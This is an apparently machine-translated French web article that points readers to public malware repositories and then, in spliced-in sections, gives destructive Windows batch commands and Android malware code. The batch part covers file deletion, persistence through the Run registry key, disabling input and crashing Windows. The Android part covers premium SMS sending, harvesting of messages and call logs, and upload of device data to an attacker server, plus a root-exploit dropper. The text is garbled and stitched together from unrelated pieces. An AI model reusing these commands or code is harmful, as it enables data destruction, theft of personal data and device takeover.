Où puis-je télécharger des échantillons de virus avec le code source et des descriptions détaillées?

Trouver une collection de virus actuels, et plus encore avec une description et un code source, n'est pas une tâche facile. Nous avons déjà indiqué où analyser et étudier. Aujourd'hui, je vais vous parler d'une autre source où vous pouvez trouver et télécharger, mais cette fois pas seulement les logiciels malveillants trouvés sur le réseau, mais les fichiers exécutables et codes source des virus avec des informations détaillées.

Dans cet article, vous découvrirez quelques projets intéressants qui proposent de plonger dans le monde du code source de toutes sortes de chevaux de Troie, de botnets, de voleurs, de vers, etc.

• Préface
• Sources de virus
• Projet TheZoo
• Projet Malware

Pourquoi et qui pourrait avoir besoin d'échantillons de virus?

Des fichiers exécutables et des sources de virus peuvent être nécessaires pour analyser les technologies utilisées par les logiciels malveillants, pour étudier le comportement des virus dans le système (surveillance du système de fichiers, des processus) et pour tester les antivirus. Les employés des sociétés d'antivirus sont prêts à payer de l'argent pour obtenir le code source d'un nouveau virus.

Est-il légal de télécharger des virus?

Vous pouvez télécharger des échantillons de virus pour étude et analyse sur votre ordinateur, mais vous ne pouvez pas en distribuer et en infecter d'autres. Plus d'informations à ce sujet dans l'article 273 du Code pénal de la Fédération de Russie.

Le but de ces projets est de donner aux spécialistes des sociétés d'antivirus et aux personnes intéressées par l'analyse de virus la compréhension de la structure du code malveillant des logiciels malveillants.

Attention! Veuillez noter que les fichiers téléchargés sont des virus fonctionnels. Certains d'entre eux essaieront d'infecter votre ordinateur. N'exécutez jamais les fichiers téléchargés sur votre ordinateur principal. Je ne recommande pas non plus de télécharger des échantillons de virus sans une connaissance approfondie de l'analyse des logiciels malveillants.

Dans tous les cas, le site www.site n'assume aucune responsabilité pour tout dommage causé par vous à vos propres ordinateurs et à ceux d'autrui.

Je recommande fortement d'utiliser. N'oubliez pas les vers malveillants qui tenteront de se propager et de s'échapper de la machine virtuelle. Pour éviter cela, je vous conseille de désactiver tous les ajouts d'invités de VM, l'accès au réseau, etc. Vous pouvez découvrir comment faire cela à partir du lien ci-dessus.

Sources de virus: theZoo Project

Commençons notre revue avec le projet theZoo, qui se traduit par un zoo (avec humour, les auteurs vont bien). Il se trouve dans le référentiel Githab.

Le but du projet est de rendre disponible l'étude des virus. Les auteurs collectent et mettent à jour la base de données virale. Avec l'aide de theZoo, vous pourrez accéder à des exemples de logiciels malveillants populaires.

Échantillons de virus: TheZoo Project

Le fichier exécutable et le code source sont proposés pour téléchargement et étude.

Comment utiliser theZoo?

Vous pouvez utiliser le projet theZoo de différentes manières: directement depuis le site ou en utilisant un framework. Nous couvrirons les deux sens. Commençons par le premier.

Alors, allez sur le site et voyez plusieurs répertoires et fichiers.

Fichiers exécutables de virus sont dans le répertoire:

theZoo / malwares / binaires /

Vous y trouverez le fichier exécutable des virus. Pour chaque malware individuel - un répertoire séparé contenant 4 fichiers: le malware lui-même sous forme cryptée dans une archive ZIP, SHA256 et MD5 - archivez les sommes de contrôle pour comparaison et un mot de passe pour l'archive cryptée.

Fichiers exécutables de virus: Trojan Androrat

Code source des virus sont dans le répertoire:

theZoo / malwares / Source / Original /

Chaque répertoire contient quatre fichiers similaires. Tout est le même que pour les fichiers exécutables.

Sources de virus: Trojan Dendroid

Il existe une aide pour chaque exemple individuel, mais pour utiliser l'aide, vous devez installer un framework.

Pour installer le framework theZoo, utilisez la commande:

git clone https://github.com/ytisf/theZoo

Exigences: urllib2, python3

Commandes: rechercher, utiliser, obtenir, info, lister tout, report-mal, update-db, quitter. En savoir plus sur les commandes à l'aide de la commande help.

Donc, nous avons traité ce projet, nous allons maintenant en considérer un autre.

Exemples de virus: projet de logiciels malveillants

Le projet Malware est également hébergé sur Githab. La sélection de virus n'est pas aussi large que dans le zoo, mais elle est mise à jour plus souvent. Parmi un petit nombre de programmes malveillants, vous pouvez trouver le code source des chevaux de Troie, des botnets, des ransomwares, des voleurs de mots de passe et autres «bons».

Voici la liste à ce jour:

• Alina Spark (cheval de Troie)
• Bleeding Life 2 (pack Expolit)
• Carberp (Botnet)
• Carberp (cheval de Troie bancaire)
• Crimepack 3.1.3 (pack Exploit)
• Dendroid (Trojan pour Android)
• Dexter v2 (cheval de Troie)
• Eda2, Stolich, Win32.Stolich (Ransomware)
• FlexiSpy (logiciel espion)
• (Cadre)
• GMBot (cheval de Troie Android)
• Gozi-ISFB - (Trojan bancaire)
• Grum (Spam bot)
• Équipe de piratage RCS ()
• Larme cachée (Ransomware)
• KINS (cheval de Troie bancaire)
• Mirai (Botnet IoT)
• Pony 2.0 (Styler de mot de passe)
• PowerLoader (Botnet)
• Front-end RIG (pack d'exploitation)
• Rovnix (kit de démarrage)
• Tinba (cheval de Troie bancaire)
• TinyNuke (cheval de Troie bancaire)
• Trochilus, feuilles rouges (RAT)
• Zeus (cheval de Troie bancaire)

Code source du virus: Malware Project

Allons par exemple dans le dossier Alina Trojan. Ici, on nous propose plusieurs répertoires, parmi lesquels il existe des sources. De plus, dans la partie inférieure, les auteurs ont ajouté des liens vers des informations liées au malware.

voici les instructions pour les commandes
assoc .exe \u003d .mp3-Les exécuteurs sont lancés en tant que label de musique E: pridurok-changez la vis en une heure crétine 00: 00-changez l'heure
date 13.03.36-changer la date assoc .lnk \u003d .txt-changer les étiquettes dans le fichier txt copier% 0 F: \\ Work.bat-copier l'objet

1) Un programme pour supprimer des fichiers d'un lecteur flash USB (si inséré) et le renommer.
del F: \\ *. * / q
étiquette F: HACK
2) Un programme pour changer la date et l'heure sur un ordinateur et les copier sur le lecteur C et sur un lecteur flash USB.
temps 14:13
date 11.07.12
copier% 0 C: \\ Time.bat
copie% 0 F: \\ Time.bat
----------
\u003e commande de ligne nul-hide
% SystemRoot% / system32 / rundll32 user32, SwapMouseButton - échange les touches de la souris
---------------
copier ""% 0 ″ ""% SystemRoot% \\ system32 \\ File.bat "
reg ajouter "HKLM \\ SOFTWARE \\ Microsoft \\ Windows \\ CurrentVersion \\ Run" / v "Filel" / t REG_SZ / d "% SystemRoot% \\ system32 \\ File.bat" / f
reg ajouter HKCU \\ Software \\ Microsoft \\ Windows \\ CurrentVersion \\ Policies \\ Explorer / v NoControlPanel / t REG_DWORD / d 1 / f
Une commande très cruelle: ajoute le programme au démarrage du système d'exploitation.
"Del x: \\ y *. * / Q" - supprime tous les fichiers sur le disque x dans le dossier y (sauf pour les dossiers) (exemple del F: \\ Data *. * / Q);
"Net user" x "/ add" - ajoutera un utilisateur sous le nom x à l'ordinateur (exemple utilisateur net "Smoked" / add);
"@Echo off" est entré au début de notre virus et masque tout
utilisateur rundll32, disableoemlayer - plantage du système (!) - désactiver toutes les fonctions d'E / S (clavier, écran, souris). Le résultat sera un écran noir avec un curseur et un système qui ne répondra pas, mais Windows continue de fonctionner.
del *. * / q (après l'exécution de cette commande, tous les fichiers sauf les dossiers qui se trouvaient dans le dossier où le virus a été lancé seront supprimés !!!
md 1-créer des dossiers
Pour exécuter le fichier au démarrage de Windows, renommez le fichier en Autoexec.bat
Echo Virus Chargement-inscription sur l'écran du virus lodin
del c: Program Files / q (supprime tous les fichiers de ce dossier)
reg - travail direct avec le registre. Regarder reg /? toutes les personnes!
rcp - échange de fichiers via rcp en ascii
runas - au nom de l'utilisateur
liste des tâches - Affiche les applications et les sessions qui lui sont associées.
taskkill - vous permet de tuer un ou plusieurs processus
tftp - ftp trivial
tskill - tuer un processus
reg - utilitaire pour interagir avec le registre
bootcfg - paramètre boot.ini
append - vous permet d'ouvrir les fichiers distants comme s'ils se trouvaient dans le fichier actuel.
getmac - obtenir mas
logoff - Session de l'utilisateur final.
mem - affiche des informations sur les processus en cours dans la RAM
mqbkup - archivage
netsh - ??
openfiles - affiche les fichiers ouverts.
rsh - exécute des commandes sur des hôtes distants exécutant rsh
sc - ligne de commande ??
rexec - exécute des commandes sur des hôtes distants avec rexec en cours d'exécution
shutdown - arrêt (hehe) ordinateur local ou distant.
systeminfo - affiche des informations sur l'ordinateur.
schtasks est un planificateur de tâches.
xcopy - copie des fichiers et des répertoires.
tsshutdn - arrêt du serveur dans l'ordre prescrit.
set - affiche, définit et supprime les variables d'environnement cmd.exe. Propriétés système (pr.kn. "mon ordinateur") - facultatif - Variables d'environnement. Toutes les variables ne sont pas là, mais beaucoup! Tout semble prêt.
En passant, voici quelques commandes RunDLL qui peuvent être utilisées pour créer des fichiers batch

utilisateur rundll32, wnetdisconnectdialog
Déconnecter l'appel de fenêtre de lecteur réseau

utilisateur rundll32, disableoemlayer
Ne pas provoquer

utilisateur rundll32, repaintscreen
Mettre à jour (comment)

utilisateur rundll32, setcursorpos
Maus-Cursor à gauche pour planter

copie de disque rundll32, DiskCopyRunDll
Appel de la fenêtre "Copier le disque"

rundll32 rnaui.dll, RnaWizard / 1
Dialogue Appel "Etablissement de connexion" (/ 1 \u003d sans fenêtre)

coquille rundll32, shellexecute
Explorer-Window ouvert dans le répertoire racine

rundll32 shell32, OpenAs_RunDLL
Ouvrir avec ... appel de fenêtre ***

rundll32 shell32, SHFormatDrive
Appel de la fenêtre "Format: Disk3,5 (A)"

rundll32 shell32, ShellAboutA
Appel Info-Box (à propos de Windows)

rundll32 shell32, SHExitWindowsEx 0
Redémarrez Windows 98 (sans autoexec.bat, etc.)

rundll32 shell32, SHExitWindowsEx 1
Terminez de travailler avec Windows 98

rundll32 shell32, SHExitWindowsEx 2
Démarrage Windows-98-PC

rundll32 shell32, SHExitWindowsEx -1
Redémarrage de Windows-98-Explorer

rundll32 shell32, Control_RunDLL
Ouvrez la fenêtre "Panneau de configuration"

rundll32 shell32, Control_RunDLL desk.cpl
Ouvrez "Propriétés de l'écran"

rundll32 shell32, Control_RunDLL main.cpl
Ouvrez le panneau de contrôle de module depuis MAIN.CPL **

rundll32 krnl386.exe, exitkernel
quitter Windows sans aucun message / question

utilisateur rundll32, swapmousebutton
"Déplacer" les touches de la souris *

clavier rundll32, désactiver
"Désactiver" le clavier *

souris rundll32, désactiver
"Désactiver" la souris *

rundll rnaui.dll, «fournisseur» de RnaDial
Appelez la fenêtre "Etablissement de la connexion" avec le nom "fournisseur"

utilisateur rundll32, tilechildwindows
construire toutes les fenêtres non roulées à l'envers

utilisateur rundll32, cascadechildwindows
construire toutes les fenêtres non roulées en cascade

rundll32 sysdm.cpl, InstallDevice_Rundll
(uniquement option dans W98) Installer du matériel non Plug & Play

rundll32 msprint2.dll, RUNDLL_PrintTestPage
sélectionnez une imprimante dans le menu qui apparaît et envoyez-lui un test

utilisateur rundll32, setcaretblinktime
définir la nouvelle fréquence des malédictions clignotantes *

utilisateur rundll32, setdoubleclicktime
définir une nouvelle vitesse de double tap *

rundll32 setupx.dll, InstallHinfSection
DefaultInstall 130; C: \\ file.inf
fenêtre de redémarrage du système. Jouer maintenant? ъ Oui / non ъ ”****

ASSOC - Affiche ou modifie les associations d'extension de fichier
AT - Planifie les commandes et les programmes à exécuter sur l'ordinateur.
ATTRIB - Affiche ou modifie les attributs de fichier.
BREAK - Définit ou annule la vérification de combinaison.
CACLS - Affiche ou modifie les listes de contrôle d'accès (ACL) pour les fichiers.
CALL - Appelle un fichier * .BAT d'un autre.
CD - Affiche le nom ou modifie le nom du répertoire actuel.
CHCP - Affiche ou définit le numéro de la page de codes active.
CHDIR - Affiche le nom ou modifie le nom du répertoire actuel.
CHKDSK - Vérifie le disque et affiche un rapport d'état.
CLS - Efface l'écran.
CMD - Démarre une nouvelle instance de l'interpréteur de commandes Windows NT.
COULEUR - Définit les couleurs par défaut pour le premier plan et l'arrière-plan de la console.
COMMANDE - Démarre une nouvelle copie de l'interpréteur de commandes Windows.
COMP - Compare le contenu de deux fichiers ou ensembles de fichiers.
COMPACT - Affiche ou modifie la compression de fichier sur patricien Windows NT (NTFS).
CONVERT - Convertit les volumes FAT au format NTFS (Windows NT File System). Vous ne pouvez pas convertir le disque actuel.
COPY - Copie un ou plusieurs fichiers vers un autre emplacement.
CTTY - Change le terminal utilisé pour contrôler votre système.
DATE - Affiche ou définit la date.
DEL - Supprime un ou plusieurs fichiers.
DEBUG - Effectue le débogage, les programmes de test et les outils d'édition.
DIR - Affiche une liste de fichiers et de sous-répertoires dans un répertoire.
DISKCOMP - Compare le contenu de deux disquettes.
DISKCOPY - Copie le contenu d'une disquette sur une autre.
DOSKEY - Modifie les lignes de commande, répare les commandes Windows et crée une macro.
ECHO - Affiche les messages ou active / désactive la sortie de commande.
EMM386 - Active / désactive la prise en charge de la mémoire EMM386 étendue.
ENDLOCAL - Termine la localisation des changements environnementaux dans un fichier * .BAT.
EFFACER - Supprime un ou plusieurs fichiers.
EXIT - Termine l'exécution du programme (interpréteur de commandes).
EXTRACT - Outil pour extraire des informations à partir de fichiers CAB.
FC - Compare deux fichiers ou paramètres de fichier et affiche la différence entre eux.
FIND - Recherche une chaîne de texte dans un ou plusieurs fichiers.
FINDSTR - Recherche de chaînes dans les fichiers.
FOR - Exécute la commande spécifiée pour chaque fichier dans un ensemble de fichiers.
FORMAT - Formate un disque pour une utilisation avec Windows.
FTYPE - Affiche ou modifie les types de fichiers utilisés dans les liens d'extension.
GOTO - Dirige l'interpréteur de commandes Windows NT vers la ligne marquée dans le fichier * .BAT.
GRAFTABL - La capacité de Windows à afficher des symboles pseudo-graphiques insérés en mode graphique.
HELP - Fournit des informations d'aide pour les commandes Windows.
IF - Exécute le traitement d'une condition dans un fichier * .BAT.
KEYB - Configure le clavier pour la langue donnée.
LABEL - Crée, modifie ou supprime une étiquette de volume sur un disque.
LOADHIGH (LH) - Charge le programme aux adresses de mémoire haute.
MD - Crée un répertoire.
MEM - Affiche la quantité de mémoire utilisée et libre sur votre système.
MKDIR - Crée un répertoire.
MODE - Configure le périphérique système.
PLUS - Affiche la sortie un écran à la fois.
MOVE - Déplace un ou plusieurs fichiers d'un répertoire à un autre sur le même disque.
NETSTAT - Affiche les statistiques des protocoles et des connexions réseau TCP / IP actuelles.
NLSFUNC - Charge les informations spécifiques au pays.
PATH - Affiche ou définit le chemin de recherche des fichiers exécutables.
PAUSE - Interrompt le traitement du fichier * .BAT et affiche un message.
POPD - Restaure la valeur précédente du répertoire actuel enregistré par PUSHD.
IMPRIMER - Imprime un fichier texte.
PROMPT - Modifie l'invite de commande Windows.
PUSHD - Enregistre le répertoire actuel, puis change.
RD - Supprime un répertoire.
RECOVER - Récupère les informations lisibles à partir d'un disque défectueux ou défectueux.
REM - Écrit des commentaires (notes) dans des fichiers * .BAT ou CONFIG.SYS.
REN - Renommez le ou les fichiers.
RENAME - Renommez le ou les fichiers.
REMPLACER - Remplace les fichiers.
RESTORE - Restaure les fichiers qui ont été archivés à l'aide de la commande BACKUP.
RMDIR - Supprime un répertoire.
SET - Affiche, définit ou supprime les variables d'environnement Windows.
SETLOCAL - Démarre la localisation des modifications d'environnement dans un fichier * .BAT.
SETVER - Définit le numéro de version MS-DOS que Windows indique au programme.
SHIFT - Décale la position des paramètres remplacés dans le fichier * .BAT.
SMARTDRV - Installe et configure l'utilitaire de mise en cache SMART Drive.
TRIER - Trie le flux d'entrée.
START - Démarre une fenêtre séparée pour exécuter le programme ou la commande spécifié.
SUBST - Associe un chemin avec une lettre de lecteur.
SYS - Copie les fichiers système MS-DOS et l'interpréteur de commandes sur le lecteur que vous spécifiez.
TIME - Affiche ou règle l'heure du système.
TITLE - Définit le titre de la fenêtre pour la session.
TREE - Affiche graphiquement la structure des répertoires du lecteur ou du chemin.
TYPE - Affiche le contenu d'un fichier texte.
VER - Affiche la version de Windows.
VERIFY - Indique à Windows s'il faut vérifier si les fichiers sont correctement écrits sur le disque.
VOL - Affiche le nom du volume du disque et le numéro de série.
XCOPY - Copie les fichiers et les arborescences de répertoires.

Eh bien, si vous voulez "tuer" Windows, alors:
@Écho off
démarrer l'explorateur
démarrer l'explorateur
démarrer l'explorateur
démarrer l'explorateur - répéter 100 à nouveau et écrire pour le chargement automatique.

Certains laboratoires antivirus ont déjà plus de 10 millions d'échantillons dans leur collection d'applications Android malveillantes. Ce chiffre excite l'imagination, mais environ 9 millions 995 000 d'entre eux sont renommés des copies des virus originaux. Mais si vous analysez le code source des quelques milliers d'échantillons de logiciels malveillants restants, vous remarquerez qu'ils sont tous combinés à partir d'un petit nombre de blocs fonctionnels uniques (plusieurs modifiés et combinés de différentes manières).

Le fait est que les virmakers poursuivent le plus souvent des tâches très insignifiantes:

• envoyer un message texte à un numéro payant;
• prendre possession des informations confidentielles de l'utilisateur (numéros de téléphone, textes de messages, données d'une carte SD, etc.);
• collecter des données sur l'appareil infecté;
• prendre possession des droits d'administrateur sur l'appareil (pour installer des applications sans l'autorisation du propriétaire ou pour désactiver de manière malveillante l'appareil);
• suivre les identifiants, les mots de passe et les données de carte de paiement que l'utilisateur saisit sur les sites des systèmes bancaires Internet. Comment font-ils? Essayons d'entrer dans le monde sombre du wyrmaking mobile et voyons ce qui s'y passe.

Envoi de SMS

Qui utilise:

• AdSms;
• FakePlayer;
• HippoSms.

Le type de virus le plus courant est le cheval de Troie SMS. Ces virus envoient simplement des messages à des tarifs premium sans le consentement de l'utilisateur. Il est assez facile de créer un tel programme ou de réécrire un programme prêt à l'emploi pour le nombre souhaité. Et le processus d'obtention des avantages est extrêmement simplifié - contrairement, par exemple, au suivi des données bancaires.

Voici l'exemple de code le plus simple. C'est la fonction de base de l'envoi de SMS. Cela peut être compliqué en vérifiant l'état d'envoi, en sélectionnant des numéros en fonction de l'emplacement de l'abonné, puis en supprimant le SMS.

Private static SendSms (String DestNumber, String SmsText) (// Tentative d'exécution de la méthode sendTextMessage de l'objet SmsManager (programme standard d'envoi de SMS pour l'appareil actuel) avec le nombre minimum de paramètres: numéro de destinataire et texte du message essayez (SmsManager.getDefault (). SendTextMessage (DestNumber , , SmsText, , null); return true;))

Où trouver le code du virus

Dans la grande majorité des cas, le téléphone est infecté par l'installation d'applications. Toute application Android existe sous forme de fichier avec l'extension apk, qui, en fait, est une archive. Vous pouvez afficher son contenu à l'aide du SDK Android, du convertisseur APK vers JAR et du décompilateur Java Bytecode. La création d'applications (APK) comprend les parties suivantes:

• resources.arsc - table de ressources;
• res (dossier) - les ressources réelles (icônes, etc.);
• META-INF (dossier) - contient des fichiers avec le contenu suivant: sommes de contrôle des ressources, certificat d'application et description de l'assemblage APK;
• AndroidManifest.xml - toutes sortes d'informations de service. Y compris les autorisations que l'application demande avant l'installation pour son bon fonctionnement;
• classes.dex - vous avez probablement entendu dire que sur les systèmes d'exploitation Android, tout le code est exécuté à l'aide de la machine virtuelle Dalvik (depuis la version 4.4, le support ART apparaît), qui ne comprend pas le bytecode Java normal. Par conséquent, il existe des fichiers avec l'extension dex. Outre les classes nécessaires et utiles (responsables de la fonctionnalité de l'application), il contient également des classes malveillantes (le code du virus, que nous analysons dans cet article).

Écriture des informations utilisateur dans un fichier texte

Qui utilise:

• NickySpy;
• SmsSpy.

Il existe une catégorie de virus qui recherchent les données personnelles des utilisateurs. Le mécanisme de leur action est également simple. Ils téléchargent les fichiers de l'utilisateur sur le serveur de leur créateur ou pré-collectent toutes les données au format txt (CSV, XML - pas essentiel). Les cybercriminels peuvent intéresser les contacts de tout type, les messages de différentes messageries instantanées, les fichiers multimédias, etc.

Les SMS des utilisateurs infectés sont particulièrement précieux pour les numéros de téléphone des expéditeurs et des destinataires - ils peuvent être utilisés pour reconstituer la base de données pour les spams. Moins souvent, des virus de ce type sont utilisés pour infecter les appareils d'individus spécifiques - la prochaine fois que votre petite amie vous invite à tester une application qui lui est écrite (ay, caramba! - N.D.

// Compte le nombre de SMS sur le périphérique arrayOfObject \u003d (Object) localBundle.get ("pdus"); int j \u003d arrayOfObject.length; // Boucle sur chaque SMS i \u003d 1 while (true) (if (i\u003e \u003d j) break; // Crée un objet de message SMS SmsMessage localSmsMessage \u003d SmsMessage.createFrompdu ((byte) arrayOfObject [i]); // Put aux variables de chaîne le numéro de l'expéditeur, le texte et l'heure d'envoi du SMS String MessageNumber \u003d localSmsMessage.getOriginatingAddress (); String MessageText \u003d localSmsMessage.getDisplayMessageBody (); long l \u003d localSmsMessage.getTimestampMillis (); Date localDate \u003d Date (l); StringTimeDate new SimpleDateFormat ("aaaa-MM-jj HH: mm: ss"). format (localDate); // Formez une chaîne à partir des données reçues et écrivez-la dans un fichier texte à l'aide de la méthode utilisateur WriteRec String MessageInfo \u003d 7MessageNumber + "#" + MessageText + "#" + MessageTimeDate + ";" WriteRec (paramContext, "sms.txt", MessageInfo); // Aller au message suivant i + \u003d 1;) Il est également pratique de reconstituer la liste de spam à partir de l'historique des appels de l'abonné. Ce code peut être exécuté sur un appel entrant: If (parmIntent.getAction (). Equals ("android.intent.action.NEW_OUTGOING_CALL")) (// Mettez le numéro de l'abonné dans la variable String phonenumber \u003d paramIntent.getStringExtra ("android.intent. extra.PHONE_NUMBER "); // Formez une chaîne à partir du numéro et de la date de l'appel String PhoneCallRecord \u003d phonenumber +" # "+ getSystemTime (); // Appelez la méthode WriteRec () (son code n'est pas donné ici), qui ajoute une ligne à un fichier texte avec historique des appels WriteRec (paramContext, "phonecall.txt", PhoneCallRecord);)

Une fois les informations écrites, elles sont transmises aux «bonnes mains». Le code ci-dessous télécharge l'historique des appels sur le serveur:

Private void uploadPhonecallHistory () jette une IDException (while (true) (return; // Vérifie si le fichier dont nous avons besoin existe si (! FileIsExists (/data/data/spyapp.pg/files/phonecall.txt ")) continue; // Créer un objet - fichier uploader UploadFiles localUploadFiles \u003d new UploadFiles (); String uploadkeynode \u003d getKeyNode ("uid", "uid_v"); // Exécutez la méthode .advanceduploadfile (son code n'est pas fourni ici) pour télécharger le fichier sur le serveur du "virus maker" localUploadFiles. advanceduploadfile (uploadkeynode, "/ data / data / spyapp.pg / files / phonecall.txt");))

Collecte d'informations

Qui utilise:

• DroidKungFu;
• DroidDream;
• l'écrasante majorité de tous les logiciels malveillants similaires.

En principe, tout créateur de virus fournit des informations utiles sur les appareils infectés par ses programmes. C'est très facile de l'obtenir. Un tableau est créé avec des données sur les propriétés du téléphone (une liste complète peut être trouvée dans le guide du développeur Android) et envoyé en tant que requête POST à \u200b\u200bun script PHP (le langage n'est pas fondamental) sur le serveur de l'attaquant, qui traite les données et les met dans une base de données pour une utilisation ultérieure.

Private void reportState (int paramInt, string paramString) (// Crée un tableau et y place les informations de service ArrayList UserInformation \u003d new ArrayList (); UserInformation.add (new BasicNameValuePair ("imei", this.mImei)); UserInformation.add ( new BasicNameValuePair ("taskid", this.mTaskId)); UserInformation.add (new BasicNameValuePair ("state", Integer.toString (paramInt))); // Si la fonction a le paramètre "paramString (comment)", placez-le dans le tableau et son if (paramStrng! \u003d null) && (! "". equals (paramString))) UserInformation.add (new BasicNameValuePair ("comment", paramString)); // Créer une requête HTTP POST avec l'adresse du script qui collecte les données HttpPost localHttpPost \u003d new HttpPost ("http://search.virusxxxdomain.com:8511/search/rtpy.php"); try (// Ajoutez notre tableau de données à la requête et exécutez-le à l'aide d'un client HTTP standard localHttpPost.setEntity (new UrlEncodeFormEntity (UserInformation, "UTF-8"))); new DefaultHttpClient (). execute (localHttpPost) .getStatusLine.getStatusCode (); revenir; ))

Enracinement

Qui utilise:

• DroidKungFu;
• DroidDream;
• RootSmart.

L'une des choses les plus frustrantes qui puissent arriver à un appareil Android est de l'enraciner avec un virus. Après cela, le programme malveillant peut tout faire: installer d'autres virus, modifier les paramètres matériels. Cette action est effectuée en lançant séquentiellement des exploits:

Private void RootFunc () (ApplicationInfo localApplicationInfo \u003d getApplicationInfo (); / * "ratc" est une copie du célèbre exploit racine de Rage Against The Cage. Kiall - arrête tous les processus lancés par l'application actuelle. Gjsvro - un exploit pour acquérir les droits udev (utilisé dans Systèmes Linux pour un travail prolongé avec du matériel et des interfaces réseau) Copiez tout cela au bon endroit * / Utils.copyAssets (this, "ratc", "/ data / data" + localApplicationInfo.packageName + "/ ratc"); Utils .copyAssets (this, "killall", "/ data / data" + localApplicationInfo.packageName + "/ killall"); Utils.copyAssets (this, "gjsvro", "/ data / data" + localApplicationInfo.packageName + "/ gjsvro "); // Et exécutez en utilisant la ligne de commande Utils.oldrun (" / system / bin / chmod "," 4755 /data/data"+localApplicationInfo.packageName + "/ ratc"); Utils.oldrun ("/ system / bin / chmod "," 4755 /data/data"+localApplicationInfo.packageName + "/ killall"); Utils.oldrun ("/ system / bin / chmod", "4755 /data/data"+localApplicationInfo.packag eName + "/ gjsvro"); new MyTread.start (); )

Sites Web sur les logiciels malveillants mobiles

Blog d'experts de Kasperskiy Lab Cette ressource contient des articles détaillés et de haute qualité sur de nombreux aspects de la sécurité informatique, y compris les virus Android. Il vaut la peine de visiter ce site régulièrement pour se tenir au courant des derniers développements.

Le groupe est dédié à un outil open source pour toutes sortes de manipulations avec le code des applications Android (décompilation et modification de fichiers DEX / ODEX / APK, etc.). Androguard contient également une vaste base de données d'articles sur les virus. En plus des brefs examens des fonctionnalités et des méthodes de protection, il existe des analyses détaillées du code du malware.

Section Menaces mobiles sur www.fortiguard.com Encyclopédie des virus téléphoniques. Chaque article est un aperçu de la fonctionnalité, agrémenté d'une quantité importante de détails techniques. En plus des informations sur les menaces pesant sur le système d'exploitation Android, il existe des articles sur les virus pour Symbian OS, iOS et d'autres plates-formes.

Protection contre le virus

Certains utilisateurs pensent que si vous téléchargez des applications exclusivement à partir de Google Play et installez un antivirus sur leur smartphone, cela garantira une sécurité à 100%. Ne vous leurrez pas: il y a des rapports réguliers sur le Web indiquant que des logiciels malveillants sont trouvés sur le marché officiel. Et le nombre de programmes malveillants nouvellement émergents est mesuré en centaines de milliers par mois, ce qui les empêche d'accéder rapidement aux bases de données antivirus. Une réelle garantie de sécurité peut être donnée en visualisant manuellement le code du fichier APK avant de l'installer sur le téléphone. Vous n'avez pas besoin d'être un gourou du codage pour repérer les fragments malveillants. Et notre article vous aidera avec cela.

Conclusion

Comme nous pouvons le voir à partir des exemples, le câblage mobile ne diffère pas par sa complexité technologique. Bien sûr, ces exemples sont simplifiés pour s'adapter au format du journal - tout d'abord, il manque des gestionnaires d'erreurs et d'exceptions, ainsi que certains détails techniques, dont l'absence ne vous empêchera pas de comprendre les principes des logiciels malveillants Android, mais vous protégera des expériences inutiles. Nous ne soutenons pas la création de virus, n'est-ce pas? 🙂